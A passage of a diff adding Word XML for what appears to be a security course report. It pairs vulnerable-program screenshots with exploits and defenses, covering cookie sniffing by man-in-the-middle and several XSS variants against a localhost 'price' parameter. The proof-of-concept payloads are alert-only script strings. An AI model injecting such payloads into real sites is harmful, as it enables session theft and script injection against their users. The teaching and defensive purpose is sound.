+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We have the PHPSESSID if we do a man in the middle attack</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D2F231" wp14:editId="063FEC26">
+            <wp:extent cx="5731510" cy="930275"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
+            <wp:docPr id="79" name="Image 79"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="930275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>We use the Secure cookie policy</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. In HTTPS, doing a MiTM won’t wor</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:t>k anymore to see the PHPSESSID.</w:t>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>DOM-based XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="7"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2B00FE" wp14:editId="191338AE">
+            <wp:extent cx="4810125" cy="1895475"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="29" name="Image 29"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4810125" cy="1895475"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Go to http://127.0.0.1/</w:t>
+      </w:r>
+      <w:r>
+        <w:t>index.php?price=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>&gt;&lt;script&gt;alert(1) ;&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43BBD159" wp14:editId="1462F58E">
+            <wp:extent cx="6065435" cy="2952750"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="30" name="Image 30"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6103566" cy="2971313"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (in commentary)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="8"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59EE5F50" wp14:editId="1FE53AD2">
+            <wp:extent cx="3429000" cy="1390650"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="39" name="Image 39"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3429000" cy="1390650"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Go to http://127.0.0.1/index.php?price=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>--&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;script&gt;alert(1) ;&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AA6E464" wp14:editId="5196B03A">
+            <wp:extent cx="3733800" cy="1390650"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="40" name="Image 40"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId30"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3733800" cy="1390650"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – 1 (in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="9"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685F5213" wp14:editId="48D4C6B7">
+            <wp:extent cx="2762250" cy="609600"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="70" name="Image 70"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId31"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2762250" cy="609600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Go to http://127.0.0.1/index.php?price=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:t>script&gt;alert(1) ;&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FB33A51" wp14:editId="65818FF3">
+            <wp:extent cx="4162425" cy="619125"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="69" name="Image 69"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId32"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4162425" cy="619125"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (in attributes)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="10"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69D64717" wp14:editId="24FAF4C2">
+            <wp:extent cx="4400550" cy="1066800"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="43" name="Image 43"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4400550" cy="1066800"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId34" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/index.php?price</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>=</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>&gt;&lt;/h4&gt;&lt;script&gt;alert(1);&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E6BEF2D" wp14:editId="5C7D3F89">
+            <wp:extent cx="3209925" cy="990600"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="44" name="Image 44"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3209925" cy="990600"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
+      </w:r>
+      <w:r>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (in attributes) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Appelnotedebasdep"/>
+        </w:rPr>
+        <w:footnoteReference w:id="11"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable program</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="416CDCBC" wp14:editId="4B342575">
+            <wp:extent cx="4010025" cy="1200150"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:docPr id="73" name="Image 73"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId36"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4010025" cy="1200150"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Exploit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="19"/>
+        </w:numPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Go to </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId37" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>http://127.0.0.1/index.php?price=</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Lienhypertexte"/>
+          </w:rPr>
+          <w:t>1</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:t>; alert(3) ;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="1800"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Defense system</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="377B6A46" wp14:editId="22AE84CC">
+            <wp:extent cx="3686175" cy="1781175"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="74" name="Image 74"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId38"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3686175" cy="1781175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
